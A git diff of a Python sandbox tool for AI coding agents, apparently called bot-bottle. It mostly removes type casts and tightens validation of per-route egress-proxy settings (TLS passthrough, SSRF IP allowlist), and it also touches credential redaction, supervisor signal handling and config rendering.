@@ -51,8 +50,7 @@ def codex_host_access_token(
tokens = raw.get("tokens") tokens = raw.get("tokens")
if not isinstance(tokens, dict): if not isinstance(tokens, dict):
die(f"codex host credentials: {path} is missing tokens") die(f"codex host credentials: {path} is missing tokens")
tokens_typed = cast(dict[str, object], tokens) access = tokens.get("access_token")
access = tokens_typed.get("access_token")
if not isinstance(access, str) or not access: if not isinstance(access, str) or not access:
die( die(
f"codex host credentials: {path} is missing tokens.access_token. " f"codex host credentials: {path} is missing tokens.access_token. "
@@ -107,14 +105,14 @@ def write_codex_dummy_auth_file(
path.chmod(0o600) path.chmod(0o600)
def _read_auth_object(path: Path) -> dict[str, object]: def _read_auth_object(path: Path) -> dict:
try: try:
raw = json.loads(path.read_text()) raw = json.loads(path.read_text())
except (OSError, json.JSONDecodeError) as e: except (OSError, json.JSONDecodeError) as e:
die(f"codex host credentials: could not read valid JSON at {path}: {e}") die(f"codex host credentials: could not read valid JSON at {path}: {e}")
if not isinstance(raw, dict): if not isinstance(raw, dict):
die(f"codex host credentials: {path} must contain a JSON object") die(f"codex host credentials: {path} must contain a JSON object")
return cast(dict[str, object], raw) return raw
def _dummy_exp(now: datetime | None, exp_ts: int | None) -> int: def _dummy_exp(now: datetime | None, exp_ts: int | None) -> int:
@@ -153,11 +151,11 @@ def _dummy_jwt_from_host(
return _dummy_jwt(now, exp_ts=exp_ts) return _dummy_jwt(now, exp_ts=exp_ts)
if not isinstance(payload, dict): if not isinstance(payload, dict):
return _dummy_jwt(now, exp_ts=exp_ts) return _dummy_jwt(now, exp_ts=exp_ts)
return _encode_dummy_jwt(_redact_jwt_payload(cast(dict[str, object], payload), now=now, exp_ts=exp_ts)) return _encode_dummy_jwt(_redact_jwt_payload(payload, now=now, exp_ts=exp_ts))
def _encode_dummy_jwt(payload: dict[str, object]) -> str: def _encode_dummy_jwt(payload: dict) -> str:
def enc(obj: dict[str, object]) -> str: def enc(obj: dict) -> str:
raw = json.dumps(obj, separators=(",", ":")).encode() raw = json.dumps(obj, separators=(",", ":")).encode()
return base64.urlsafe_b64encode(raw).decode().rstrip("=") return base64.urlsafe_b64encode(raw).decode().rstrip("=")
@@ -165,24 +163,23 @@ def _encode_dummy_jwt(payload: dict[str, object]) -> str:
def _redact_jwt_payload( def _redact_jwt_payload(
payload: dict[str, object], payload: dict,
*, *,
now: datetime | None = None, now: datetime | None = None,
exp_ts: int | None = None, exp_ts: int | None = None,
) -> dict[str, object]: ) -> dict:
out = _redact_claims(payload) out = _redact_claims(payload)
if not isinstance(out, dict): if not isinstance(out, dict):
out = {} out = {}
out_typed: dict[str, object] = cast(dict[str, object], out) out["exp"] = _dummy_exp(now, exp_ts)
out_typed["exp"] = _dummy_exp(now, exp_ts) out.setdefault("sub", "bot-bottle-placeholder")
out_typed.setdefault("sub", "bot-bottle-placeholder") return out
return out_typed
def _redact_claims(value: object) -> object: def _redact_claims(value: object) -> object:
if isinstance(value, dict): if isinstance(value, dict):
out: dict[str, object] = {} out: dict[str, object] = {}
for key, inner in cast(dict[str, object], value).items(): for key, inner in value.items():
lower = key.lower() lower = key.lower()
if key == "https://api.openai.com/profile": if key == "https://api.openai.com/profile":
out[key] = _redact_profile_claim(inner) out[key] = _redact_profile_claim(inner)
@@ -210,16 +207,16 @@ def _redact_claims(value: object) -> object:
return "bot-bottle-placeholder" return "bot-bottle-placeholder"
def _redact_profile_claim(value: object) -> dict[str, object]: def _redact_profile_claim(value: object) -> dict:
profile = cast(dict[str, object], value) if isinstance(value, dict) else {} profile = value if isinstance(value, dict) else {}
return { return {
"email": "bot-bottle@example.invalid", "email": "bot-bottle@example.invalid",
"email_verified": bool(profile.get("email_verified", True)), "email_verified": bool(profile.get("email_verified", True)),
} }
def _redact_auth_claim(value: object) -> dict[str, object]: def _redact_auth_claim(value: object) -> dict:
auth = cast(dict[str, object], value) if isinstance(value, dict) else {} auth = value if isinstance(value, dict) else {}
out: dict[str, object] = {} out: dict[str, object] = {}
for key, inner in auth.items(): for key, inner in auth.items():
lower = key.lower() lower = key.lower()
@@ -250,7 +247,7 @@ def _redact_auth_claim(value: object) -> dict[str, object]:
def _redact_codex_auth( def _redact_codex_auth(
value: object, *, now: datetime | None = None, exp_ts: int | None = None, value: object, *, now: datetime | None = None, exp_ts: int | None = None,
) -> object: ) -> object:
auth = cast(dict[str, object], value) if isinstance(value, dict) else {} auth = value if isinstance(value, dict) else {}
out: dict[str, object] = {} out: dict[str, object] = {}
for key, inner in auth.items(): for key, inner in auth.items():
lower = key.lower() lower = key.lower()
@@ -272,7 +269,7 @@ def _redact_codex_auth(
def _redact_token_block( def _redact_token_block(
value: object, *, now: datetime | None = None, exp_ts: int | None = None, value: object, *, now: datetime | None = None, exp_ts: int | None = None,
) -> dict[str, object]: ) -> dict[str, object]:
tokens = cast(dict[str, object], value) if isinstance(value, dict) else {} tokens = value if isinstance(value, dict) else {}
out: dict[str, object] = {} out: dict[str, object] = {}
for key, inner in tokens.items(): for key, inner in tokens.items():
lower = key.lower() lower = key.lower()
@@ -309,7 +306,7 @@ def _jwt_exp(token: str) -> datetime | None:
return None return None
if not isinstance(payload, dict): if not isinstance(payload, dict):
return None return None
exp = cast(dict[str, object], payload).get("exp") exp = payload.get("exp")
if not isinstance(exp, (int, float)): if not isinstance(exp, (int, float)):
return None return None
return datetime.fromtimestamp(exp, timezone.utc) return datetime.fromtimestamp(exp, timezone.utc)
+1 -1
View File
@@ -144,7 +144,7 @@ class ClaudeAgentProvider(AgentProvider):
prompt (drives `--append-system-prompt-file`); the file is prompt (drives `--append-system-prompt-file`); the file is
copied either way so the path always exists.""" copied either way so the path always exists."""
prompt_path = _prompt_path(plan.guest_home) prompt_path = _prompt_path(plan.guest_home)
bottle.cp_in(str(plan.prompt_file), prompt_path) # type: ignore bottle.cp_in(str(plan.prompt_file), prompt_path)
bottle.exec( bottle.exec(
f"chown node:node {prompt_path} && chmod 600 {prompt_path}", f"chown node:node {prompt_path} && chmod 600 {prompt_path}",
user="root", user="root",
+1 -1
View File
@@ -189,7 +189,7 @@ class CodexAgentProvider(AgentProvider):
instructions in <path>.` bootstrap (see `prompt_args`); the instructions in <path>.` bootstrap (see `prompt_args`); the
file is copied either way so the path always exists.""" file is copied either way so the path always exists."""
prompt_path = _prompt_path(plan.guest_home) prompt_path = _prompt_path(plan.guest_home)
bottle.cp_in(str(plan.prompt_file), prompt_path) # type: ignore bottle.cp_in(str(plan.prompt_file), prompt_path)
bottle.exec( bottle.exec(
f"chown node:node {prompt_path} && chmod 600 {prompt_path}", f"chown node:node {prompt_path} && chmod 600 {prompt_path}",
user="root", user="root",
@@ -117,5 +117,5 @@ def _split_owner_repo(owner_repo: str) -> tuple[str, str]:
def _read_error_body(exc: urllib.error.HTTPError) -> str: def _read_error_body(exc: urllib.error.HTTPError) -> str:
try: try:
return exc.read().decode("utf-8", errors="replace") return exc.read().decode("utf-8", errors="replace")
except Exception: # noqa: broad-exception-caught — safely fallback to empty error message except Exception:
return "" return ""
+4 -6
View File
@@ -141,15 +141,13 @@ def egress_manifest_routes(
routes are merged.""" routes are merged."""
out: list[EgressRoute] = [] out: list[EgressRoute] = []
for r in bottle.egress.routes: for r in bottle.egress.routes:
tls_pt = r.Pipelock.Config.get("tls_passthrough", False)
tls_passthrough = tls_pt if isinstance(tls_pt, bool) else False
out.append(EgressRoute( out.append(EgressRoute(
host=r.Host, host=r.Host,
path_allowlist=r.PathAllowlist, path_allowlist=r.PathAllowlist,
auth_scheme=r.AuthScheme, auth_scheme=r.AuthScheme,
token_ref=r.TokenRef, token_ref=r.TokenRef,
roles=r.Role, roles=r.Role,
tls_passthrough=tls_passthrough, tls_passthrough=r.Pipelock.TlsPassthrough,
)) ))
return tuple(out) return tuple(out)
@@ -218,14 +216,14 @@ def egress_token_env_map(
return out return out
def _route_to_yaml_fields(r: Route) -> dict[str, object]: def _route_to_yaml_fields(r: Route) -> dict:
"""Return the addon-visible fields for one route. """Return the addon-visible fields for one route.
Single authoritative mapping between EgressRoute (host-side) and Single authoritative mapping between EgressRoute (host-side) and
egress_addon_core.Route (sidecar-side). When a field is added to egress_addon_core.Route (sidecar-side). When a field is added to
the addon's Route that must appear in the YAML, add it here and the addon's Route that must appear in the YAML, add it here and
in egress_addon_core._parse_one together.""" in egress_addon_core._parse_one together."""
fields: dict[str, object] = {"host": r.host} fields: dict = {"host": r.host}
if r.auth_scheme and r.token_env: if r.auth_scheme and r.token_env:
fields["auth_scheme"] = r.auth_scheme fields["auth_scheme"] = r.auth_scheme
fields["token_env"] = r.token_env fields["token_env"] = r.token_env
@@ -254,7 +252,7 @@ def egress_render_routes(
lines.append(f' token_env: "{f["token_env"]}"') lines.append(f' token_env: "{f["token_env"]}"')
if "path_allowlist" in f: if "path_allowlist" in f:
lines.append(" path_allowlist:") lines.append(" path_allowlist:")
for p in f["path_allowlist"]: # type: ignore for p in f["path_allowlist"]:
lines.append(f' - "{p}"') lines.append(f' - "{p}"')
return "\n".join(lines) + "\n" return "\n".join(lines) + "\n"
+1 -1
View File
@@ -89,7 +89,7 @@ def _read_secret_silent(name: str, prompt_body: str) -> str:
if not (sys.stdin.isatty() or sys.stderr.isatty()): if not (sys.stdin.isatty() or sys.stderr.isatty()):
# Fall back to /dev/tty so this still works when stdin is a pipe. # Fall back to /dev/tty so this still works when stdin is a pipe.
try: try:
tty = open("/dev/tty", "r+", encoding="utf-8") tty = open("/dev/tty", "r+")
except OSError: except OSError:
die( die(
f"cannot prompt for secret '{name}': no tty available. " f"cannot prompt for secret '{name}': no tty available. "
+4 -4
View File
@@ -78,8 +78,8 @@ class GitHttpHandler(BaseHTTPRequestHandler):
"REMOTE_ADDR": self.client_address[0], "REMOTE_ADDR": self.client_address[0],
"REMOTE_PORT": str(self.client_address[1]), "REMOTE_PORT": str(self.client_address[1]),
"REMOTE_USER": "", "REMOTE_USER": "",
"SERVER_NAME": self.server.server_name, # type: ignore "SERVER_NAME": self.server.server_name,
"SERVER_PORT": str(self.server.server_port), # type: ignore "SERVER_PORT": str(self.server.server_port),
"SERVER_PROTOCOL": self.request_version, "SERVER_PROTOCOL": self.request_version,
}) })
for header, variable in ( for header, variable in (
@@ -157,8 +157,8 @@ class GitHttpHandler(BaseHTTPRequestHandler):
self.end_headers() self.end_headers()
self.wfile.write(body) self.wfile.write(body)
def log_message(self, format: str, *args: object) -> None: # type: ignore # noqa: A002 def log_message(self, fmt: str, *args: object) -> None:
sys.stdout.write(format % args + "\n") sys.stdout.write(fmt % args + "\n")
sys.stdout.flush() sys.stdout.flush()
+1 -1
View File
@@ -161,7 +161,7 @@ class Agent:
git_raw = d.get("git-gate") git_raw = d.get("git-gate")
if git_raw is not None: if git_raw is not None:
gd = as_json_object(git_raw, f"agent '{name}' git-gate") gd = as_json_object(git_raw, f"agent '{name}' git-gate")
for k in gd: for k in gd.keys():
if k != "user": if k != "user":
raise ManifestError( raise ManifestError(
f"agent '{name}' git-gate.{k} is not allowed at the " f"agent '{name}' git-gate.{k} is not allowed at the "
+47 -10
View File
@@ -2,6 +2,7 @@
from __future__ import annotations from __future__ import annotations
import ipaddress
from dataclasses import dataclass, field from dataclasses import dataclass, field
from typing import cast from typing import cast
@@ -42,18 +43,17 @@ def validate_egress_routes(
class PipelockRoutePolicy: class PipelockRoutePolicy:
"""Per-route pipelock policy overrides. """Per-route pipelock policy overrides.
Stores raw pipelock configuration that's passed through to the `TlsPassthrough` adds the route host to pipelock's
pipelock sidecar. Pipelock validates all config options, so `tls_interception.passthrough_domains`, so pipelock still enforces
bot-bottle forwards manifest settings without coercion or strict the hostname allowlist but does not MITM/decrypt request bodies or
validation. Supported options include: headers for that host.
- `tls_passthrough`: bool skip TLS MITM for this host `SsrfIpAllowlist` adds explicit IPs/CIDRs to pipelock's SSRF
- `ssrf_ip_allowlist`: list of CIDR/IP allow private destinations allowlist for private/internal destinations behind this route.
- `skip_scan_for_extensions`: list of file extensions to skip DLP
scanning for (e.g., [".whl", ".tar.gz"])
""" """
Config: dict[str, object] = field(default_factory=dict) TlsPassthrough: bool = False
SsrfIpAllowlist: tuple[str, ...] = ()
@classmethod @classmethod
def from_dict( def from_dict(
@@ -61,7 +61,44 @@ class PipelockRoutePolicy:
) -> "PipelockRoutePolicy": ) -> "PipelockRoutePolicy":
label = f"bottle '{bottle_name}' egress.routes[{idx}] pipelock" label = f"bottle '{bottle_name}' egress.routes[{idx}] pipelock"
d = as_json_object(raw, label) d = as_json_object(raw, label)
return cls(Config=d) for k in d:
if k not in ("tls_passthrough", "ssrf_ip_allowlist"):
raise ManifestError(
f"{label} has unknown key {k!r}; "
f"only 'tls_passthrough' and 'ssrf_ip_allowlist' "
f"are accepted"
)
tls_passthrough_raw = d.get("tls_passthrough", False)
if not isinstance(tls_passthrough_raw, bool):
raise ManifestError(
f"{label}.tls_passthrough must be a boolean "
f"(was {type(tls_passthrough_raw).__name__})"
)
ssrf_raw = d.get("ssrf_ip_allowlist", [])
if not isinstance(ssrf_raw, list):
raise ManifestError(
f"{label}.ssrf_ip_allowlist must be an array "
f"(was {type(ssrf_raw).__name__})"
)
ssrf_ip_allowlist: list[str] = []
for j, item in enumerate(ssrf_raw):
if not isinstance(item, str) or not item:
raise ManifestError(
f"{label}.ssrf_ip_allowlist[{j}] must be a non-empty "
f"string (was {type(item).__name__})"
)
try:
ipaddress.ip_network(item, strict=False)
except ValueError as e:
raise ManifestError(
f"{label}.ssrf_ip_allowlist[{j}] must be an IP address "
f"or CIDR (was {item!r}): {e}"
)
ssrf_ip_allowlist.append(item)
return cls(
TlsPassthrough=tls_passthrough_raw,
SsrfIpAllowlist=tuple(ssrf_ip_allowlist),
)
@dataclass(frozen=True) @dataclass(frozen=True)
+2 -2
View File
@@ -246,7 +246,7 @@ class GitUser:
@classmethod @classmethod
def from_dict(cls, bottle_name: str, raw: object) -> "GitUser": def from_dict(cls, bottle_name: str, raw: object) -> "GitUser":
d = as_json_object(raw, f"bottle '{bottle_name}' git-gate.user") d = as_json_object(raw, f"bottle '{bottle_name}' git-gate.user")
for k in d: for k in d.keys():
if k not in {"name", "email"}: if k not in {"name", "email"}:
raise ManifestError( raise ManifestError(
f"bottle '{bottle_name}' git-gate.user has unknown key {k!r}; " f"bottle '{bottle_name}' git-gate.user has unknown key {k!r}; "
@@ -281,7 +281,7 @@ def parse_git_gate_config(
raw: object, raw: object,
) -> tuple[tuple[GitEntry, ...], GitUser]: ) -> tuple[tuple[GitEntry, ...], GitUser]:
d = as_json_object(raw, f"bottle '{bottle_name}' git-gate") d = as_json_object(raw, f"bottle '{bottle_name}' git-gate")
for k in d: for k in d.keys():
if k not in {"user", "repos"}: if k not in {"user", "repos"}:
raise ManifestError( raise ManifestError(
f"bottle '{bottle_name}' git-gate has unknown key {k!r}; " f"bottle '{bottle_name}' git-gate has unknown key {k!r}; "
+5 -5
View File
@@ -54,9 +54,9 @@ def load_bottles_from_dir(bottles_dir: Path) -> dict[str, Bottle]:
try: try:
fm, _body = parse_frontmatter(path.read_text()) fm, _body = parse_frontmatter(path.read_text())
except OSError as e: except OSError as e:
raise ManifestError(f"could not read {path}: {e}") from e raise ManifestError(f"could not read {path}: {e}")
except YamlSubsetError as e: except YamlSubsetError as e:
raise ManifestError(f"{path}: {e}") from e raise ManifestError(f"{path}: {e}")
validate_bottle_frontmatter_keys(path, fm.keys()) validate_bottle_frontmatter_keys(path, fm.keys())
raws[name] = fm raws[name] = fm
return resolve_bottles(raws) return resolve_bottles(raws)
@@ -66,7 +66,7 @@ def load_agents_from_dir(
agents_dir: Path, agents_dir: Path,
bottle_names: set[str], bottle_names: set[str],
*, *,
source: str, # noqa: F841 — unused, but required by interface source: str,
) -> dict[str, Agent]: ) -> dict[str, Agent]:
"""Walk `<agents_dir>/*.md`, parse each as an agent, and return """Walk `<agents_dir>/*.md`, parse each as an agent, and return
`{name: Agent}`. The Markdown body becomes the agent's prompt. `{name: Agent}`. The Markdown body becomes the agent's prompt.
@@ -87,9 +87,9 @@ def load_agents_from_dir(
try: try:
fm, body = parse_frontmatter(path.read_text()) fm, body = parse_frontmatter(path.read_text())
except OSError as e: except OSError as e:
raise ManifestError(f"could not read {path}: {e}") from e raise ManifestError(f"could not read {path}: {e}")
except YamlSubsetError as e: except YamlSubsetError as e:
raise ManifestError(f"{path}: {e}") from e raise ManifestError(f"{path}: {e}")
validate_agent_frontmatter_keys(path, fm.keys()) validate_agent_frontmatter_keys(path, fm.keys())
# Build the dict Agent.from_dict expects. The body becomes # Build the dict Agent.from_dict expects. The body becomes
# prompt; Claude Code passthrough fields stay in fm and get # prompt; Claude Code passthrough fields stay in fm and get
+3 -3
View File
@@ -60,11 +60,11 @@ def _validate_frontmatter_keys(
) -> None: ) -> None:
from .manifest_util import ManifestError from .manifest_util import ManifestError
key_set = set(keys) # type: ignore key_set = set(keys)
unknown = key_set - allowed_keys # type: ignore unknown = key_set - allowed_keys
if unknown: if unknown:
allowed = ", ".join(sorted(allowed_keys)) allowed = ", ".join(sorted(allowed_keys))
raise ManifestError( raise ManifestError(
f"{kind} file {path}: unknown frontmatter key(s) " f"{kind} file {path}: unknown frontmatter key(s) "
f"{sorted(unknown)}; allowed keys are {allowed}." # type: ignore f"{sorted(unknown)}; allowed keys are {allowed}."
) )
+34 -41
View File
@@ -19,7 +19,6 @@ from __future__ import annotations
from dataclasses import dataclass from dataclasses import dataclass
from pathlib import Path from pathlib import Path
from typing import cast
from .egress import EgressRoute, egress_routes_for_bottle from .egress import EgressRoute, egress_routes_for_bottle
from .supervise import SUPERVISE_HOSTNAME from .supervise import SUPERVISE_HOSTNAME
@@ -132,11 +131,8 @@ def pipelock_effective_ssrf_ip_allowlist(
""" """
seen: dict[str, None] = {ip: None for ip in extra} seen: dict[str, None] = {ip: None for ip in extra}
for route in bottle.egress.routes: for route in bottle.egress.routes:
ssrf_raw = route.Pipelock.Config.get("ssrf_ip_allowlist", []) for ip in route.Pipelock.SsrfIpAllowlist:
if isinstance(ssrf_raw, list): seen.setdefault(ip, None)
for ip in ssrf_raw:
if isinstance(ip, str):
seen.setdefault(ip, None)
return sorted(seen.keys()) return sorted(seen.keys())
@@ -223,15 +219,6 @@ def pipelock_build_config(
) )
if effective_ssrf_ip_allowlist: if effective_ssrf_ip_allowlist:
cfg["ssrf"] = {"ip_allowlist": effective_ssrf_ip_allowlist} cfg["ssrf"] = {"ip_allowlist": effective_ssrf_ip_allowlist}
# Merge per-route pipelock config (e.g., response_body_scanning settings).
# Routes can specify arbitrary pipelock options that apply globally.
for route in bottle.egress.routes:
for key, value in route.Pipelock.Config.items():
if key not in ("tls_passthrough", "ssrf_ip_allowlist"):
if key not in cfg:
cfg[key] = value
return cfg return cfg
@@ -272,7 +259,7 @@ def _required_dict(
value = obj.get(key) value = obj.get(key)
if not isinstance(value, dict): if not isinstance(value, dict):
raise _pipelock_render_error(section, key, "a mapping") raise _pipelock_render_error(section, key, "a mapping")
return cast(dict[str, object], value) return value
def _required_bool(obj: dict[str, object], section: str, key: str) -> bool: def _required_bool(obj: dict[str, object], section: str, key: str) -> bool:
@@ -302,12 +289,9 @@ def _required_str_list(
key: str, key: str,
) -> list[str]: ) -> list[str]:
value = obj.get(key) value = obj.get(key)
if not isinstance(value, list): if not isinstance(value, list) or not all(isinstance(v, str) for v in value):
raise _pipelock_render_error(section, key, "a list of strings") raise _pipelock_render_error(section, key, "a list of strings")
value_list = cast(list[object], value) return value
if not all(isinstance(v, str) for v in value_list):
raise _pipelock_render_error(section, key, "a list of strings")
return cast(list[str], value)
def _optional_str_list( def _optional_str_list(
@@ -423,42 +407,49 @@ def pipelock_render_yaml(cfg: dict[str, object]) -> str:
lines: list[str] = [] lines: list[str] = []
lines.append(f"version: {cfg['version']}") lines.append(f"version: {cfg['version']}")
lines.append(f"mode: {cfg['mode']}") lines.append(f"mode: {cfg['mode']}")
lines.append(f"enforce: {_bool(cast(bool, cfg['enforce']))}") lines.append(f"enforce: {_bool(cfg['enforce'])}")
lines.append("") lines.append("")
lines.append("api_allowlist:") lines.append("api_allowlist:")
api_allowlist = cast(list[str], cfg["api_allowlist"]) api_allowlist = cfg["api_allowlist"]
assert isinstance(api_allowlist, list)
for h in api_allowlist: for h in api_allowlist:
lines.append(f' - "{h}"') lines.append(f' - "{h}"')
lines.append("") lines.append("")
if "seed_phrase_detection" in cfg: if "seed_phrase_detection" in cfg:
lines.append("seed_phrase_detection:") lines.append("seed_phrase_detection:")
spd = cast(dict[str, object], cfg["seed_phrase_detection"]) spd = cfg["seed_phrase_detection"]
lines.append(f" enabled: {_bool(cast(bool, spd['enabled']))}") assert isinstance(spd, dict)
lines.append(f" enabled: {_bool(spd['enabled'])}")
lines.append("") lines.append("")
lines.append("forward_proxy:") lines.append("forward_proxy:")
fp = cast(dict[str, object], cfg["forward_proxy"]) fp = cfg["forward_proxy"]
lines.append(f" enabled: {_bool(cast(bool, fp['enabled']))}") assert isinstance(fp, dict)
lines.append(f" enabled: {_bool(fp['enabled'])}")
lines.append("") lines.append("")
lines.append("dlp:") lines.append("dlp:")
dlp = cast(dict[str, object], cfg["dlp"]) dlp = cfg["dlp"]
lines.append(f" include_defaults: {_bool(cast(bool, dlp['include_defaults']))}") assert isinstance(dlp, dict)
lines.append(f" scan_env: {_bool(cast(bool, dlp['scan_env']))}") lines.append(f" include_defaults: {_bool(dlp['include_defaults'])}")
lines.append(f" scan_env: {_bool(dlp['scan_env'])}")
lines.append("") lines.append("")
lines.append("request_body_scanning:") lines.append("request_body_scanning:")
rbs = cast(dict[str, object], cfg["request_body_scanning"]) rbs = cfg["request_body_scanning"]
lines.append(f' action: "{cast(str, rbs["action"])}"') assert isinstance(rbs, dict)
lines.append(f' action: "{rbs["action"]}"')
if "scan_headers" in rbs: if "scan_headers" in rbs:
lines.append(f" scan_headers: {_bool(cast(bool, rbs['scan_headers']))}") lines.append(f" scan_headers: {_bool(rbs['scan_headers'])}")
if "header_mode" in rbs: if "header_mode" in rbs:
lines.append(f' header_mode: "{cast(str, rbs["header_mode"])}"') lines.append(f' header_mode: "{rbs["header_mode"]}"')
if "tls_interception" in cfg: if "tls_interception" in cfg:
lines.append("") lines.append("")
lines.append("tls_interception:") lines.append("tls_interception:")
tls = cast(dict[str, object], cfg["tls_interception"]) tls = cfg["tls_interception"]
lines.append(f" enabled: {_bool(cast(bool, tls['enabled']))}") assert isinstance(tls, dict)
lines.append(f' ca_cert: "{cast(str, tls["ca_cert"])}"') lines.append(f" enabled: {_bool(tls['enabled'])}")
lines.append(f' ca_key: "{cast(str, tls["ca_key"])}"') lines.append(f' ca_cert: "{tls["ca_cert"]}"')
passthrough = cast(list[str], tls["passthrough_domains"]) lines.append(f' ca_key: "{tls["ca_key"]}"')
passthrough = tls["passthrough_domains"]
assert isinstance(passthrough, list)
if passthrough: if passthrough:
lines.append(" passthrough_domains:") lines.append(" passthrough_domains:")
for d in passthrough: for d in passthrough:
@@ -466,9 +457,11 @@ def pipelock_render_yaml(cfg: dict[str, object]) -> str:
if "ssrf" in cfg: if "ssrf" in cfg:
lines.append("") lines.append("")
lines.append("ssrf:") lines.append("ssrf:")
ssrf = cast(dict[str, object], cfg["ssrf"]) ssrf = cfg["ssrf"]
assert isinstance(ssrf, dict)
lines.append(" ip_allowlist:") lines.append(" ip_allowlist:")
ip_allowlist = cast(list[str], ssrf["ip_allowlist"]) ip_allowlist = ssrf["ip_allowlist"]
assert isinstance(ip_allowlist, list)
for ip in ip_allowlist: for ip in ip_allowlist:
lines.append(f' - "{ip}"') lines.append(f' - "{ip}"')
return "\n".join(lines) + "\n" return "\n".join(lines) + "\n"
+6 -6
View File
@@ -138,7 +138,7 @@ def _pump(name: str, stream: IO[bytes]) -> None:
sys.stdout.flush() sys.stdout.flush()
def _spawn(spec: _DaemonSpec) -> subprocess.Popen[bytes]: def _spawn(spec: _DaemonSpec) -> subprocess.Popen:
proc = subprocess.Popen( proc = subprocess.Popen(
list(spec.argv), list(spec.argv),
stdout=subprocess.PIPE, stdout=subprocess.PIPE,
@@ -158,7 +158,7 @@ class _Supervisor:
def __init__(self, specs: Sequence[_DaemonSpec]): def __init__(self, specs: Sequence[_DaemonSpec]):
self.specs = tuple(specs) self.specs = tuple(specs)
self.procs: list[tuple[_DaemonSpec, subprocess.Popen[bytes]]] = [] self.procs: list[tuple[_DaemonSpec, subprocess.Popen]] = []
self.shutdown_at: float | None = None self.shutdown_at: float | None = None
# Names of children that have been logged as having exited # Names of children that have been logged as having exited
# so we only log each death once across watch-loop ticks. # so we only log each death once across watch-loop ticks.
@@ -360,20 +360,20 @@ def main(argv: Sequence[str] | None = None) -> int:
sup = _Supervisor(specs) sup = _Supervisor(specs)
sup.start_all() sup.start_all()
signal.signal(signal.SIGTERM, lambda *_: sup.request_shutdown("SIGTERM")) # type: ignore signal.signal(signal.SIGTERM, lambda *_: sup.request_shutdown("SIGTERM"))
signal.signal(signal.SIGINT, lambda *_: sup.request_shutdown("SIGINT")) # type: ignore signal.signal(signal.SIGINT, lambda *_: sup.request_shutdown("SIGINT"))
# SIGHUP reload path: egress_apply.py runs `docker kill # SIGHUP reload path: egress_apply.py runs `docker kill
# --signal HUP <bundle>` after writing routes.yaml. The kernel # --signal HUP <bundle>` after writing routes.yaml. The kernel
# delivers SIGHUP to PID 1 (this supervisor); forward it to # delivers SIGHUP to PID 1 (this supervisor); forward it to
# mitmdump so it reloads its addon. # mitmdump so it reloads its addon.
signal.signal(signal.SIGHUP, lambda *_: sup.forward_signal(signal.SIGHUP, "egress")) # type: ignore signal.signal(signal.SIGHUP, lambda *_: sup.forward_signal(signal.SIGHUP, "egress"))
# SIGUSR1 pipelock-restart path: pipelock_apply.py runs # SIGUSR1 pipelock-restart path: pipelock_apply.py runs
# `docker kill --signal USR1 <bundle>` after writing # `docker kill --signal USR1 <bundle>` after writing
# pipelock.yaml. Pipelock has no in-process reload, so the # pipelock.yaml. Pipelock has no in-process reload, so the
# supervisor restarts the pipelock daemon in place (other # supervisor restarts the pipelock daemon in place (other
# daemons keep running — specifically supervise, whose MCP # daemons keep running — specifically supervise, whose MCP
# socket would drop on a whole-container `docker restart`). # socket would drop on a whole-container `docker restart`).
signal.signal(signal.SIGUSR1, lambda *_: sup.request_restart("pipelock")) # type: ignore signal.signal(signal.SIGUSR1, lambda *_: sup.request_restart("pipelock"))
while not sup.tick(): while not sup.tick():
time.sleep(_POLL_INTERVAL) time.sleep(_POLL_INTERVAL)
+4 -4
View File
@@ -519,22 +519,22 @@ def _atomic_write(path: Path, content: str, *, mode: int) -> None:
try: try:
import fcntl as _fcntl import fcntl as _fcntl
def _try_flock(fd: int) -> None: # type: ignore[reportRedeclaration] def _try_flock(fd: int) -> None:
try: try:
_fcntl.flock(fd, _fcntl.LOCK_EX) _fcntl.flock(fd, _fcntl.LOCK_EX)
except OSError: except OSError:
pass pass
def _try_funlock(fd: int) -> None: # type: ignore[reportRedeclaration] def _try_funlock(fd: int) -> None:
try: try:
_fcntl.flock(fd, _fcntl.LOCK_UN) _fcntl.flock(fd, _fcntl.LOCK_UN)
except OSError: except OSError:
pass pass
except ImportError: # pragma: no cover — Windows path except ImportError: # pragma: no cover — Windows path
def _try_flock(fd: int) -> None: # noqa: F841 — Windows fallback def _try_flock(fd: int) -> None:
return None return None
def _try_funlock(fd: int) -> None: # noqa: F841 — Windows fallback def _try_funlock(fd: int) -> None:
return None return None
+3 -3
View File
@@ -485,7 +485,7 @@ def handle_tools_call(
if not isinstance(name, str): if not isinstance(name, str):
raise _RpcError(ERR_INVALID_PARAMS, "tools/call missing 'name'") raise _RpcError(ERR_INVALID_PARAMS, "tools/call missing 'name'")
if name == _sv.TOOL_LIST_EGRESS_ROUTES: if name == _sv.TOOL_LIST_EGRESS_ROUTES:
return handle_list_egress_routes(typing.cast(dict[str, object], params.get("arguments", {})), config) return handle_list_egress_routes(params.get("arguments", {}), config)
args_raw = params.get("arguments", {}) args_raw = params.get("arguments", {})
if not isinstance(args_raw, dict): if not isinstance(args_raw, dict):
@@ -590,7 +590,7 @@ class MCPHandler(http.server.BaseHTTPRequestHandler):
server_version = f"{SERVER_NAME}/{SERVER_VERSION}" server_version = f"{SERVER_NAME}/{SERVER_VERSION}"
def log_message(self, format: str, *args: typing.Any) -> None: # noqa: A002 def log_message(self, format: str, *args: typing.Any) -> None:
if os.environ.get("SUPERVISE_DEBUG"): if os.environ.get("SUPERVISE_DEBUG"):
super().log_message(format, *args) super().log_message(format, *args)
@@ -630,7 +630,7 @@ class MCPHandler(http.server.BaseHTTPRequestHandler):
except _RpcError as e: except _RpcError as e:
self._write_jsonrpc(jsonrpc_error(req.id, e.code, e.message)) self._write_jsonrpc(jsonrpc_error(req.id, e.code, e.message))
return return
except Exception as e: # noqa: W0718 — catch-all for RPC dispatch errors except Exception as e: # pragma: no cover — defensive
sys.stderr.write(f"supervise: internal error: {e}\n") sys.stderr.write(f"supervise: internal error: {e}\n")
self._write_jsonrpc(jsonrpc_error(req.id, ERR_INTERNAL, "internal error")) self._write_jsonrpc(jsonrpc_error(req.id, ERR_INTERNAL, "internal error"))
return return
+2 -9
View File
@@ -13,15 +13,8 @@ DEFAULT_WORKSPACE_MODE = "755"
class WorkspaceSpec(Protocol): class WorkspaceSpec(Protocol):
@property copy_cwd: bool
def copy_cwd(self) -> bool: user_cwd: str
"""Whether to copy the current working directory."""
...
@property
def user_cwd(self) -> str:
"""The user's current working directory."""
...
@dataclass(frozen=True) @dataclass(frozen=True)
+2 -4
View File
@@ -58,7 +58,6 @@ from __future__ import annotations
import re import re
from dataclasses import dataclass from dataclasses import dataclass
from typing import cast
class YamlSubsetError(ValueError): class YamlSubsetError(ValueError):
